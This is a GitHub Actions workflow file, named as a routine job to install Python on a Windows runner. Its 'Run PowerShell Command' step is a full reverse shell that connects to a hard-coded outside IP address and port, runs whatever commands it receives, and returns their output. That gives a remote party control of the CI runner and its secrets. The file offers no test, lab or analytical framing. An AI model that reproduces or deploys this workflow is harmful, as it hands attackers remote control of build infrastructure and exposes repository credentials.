name: Run PowerShell and Install Python

on:
  workflow_dispatch:

jobs:
  run-powershell:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v3
      
    - name: Install Python
      uses: actions/setup-python@v4
      with:
        python-version: '3.11'

    - name: Run PowerShell Command
      run: |
        $client = New-Object System.Net.Sockets.TCPClient('52.47.178.47',7654);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
      shell: powershell
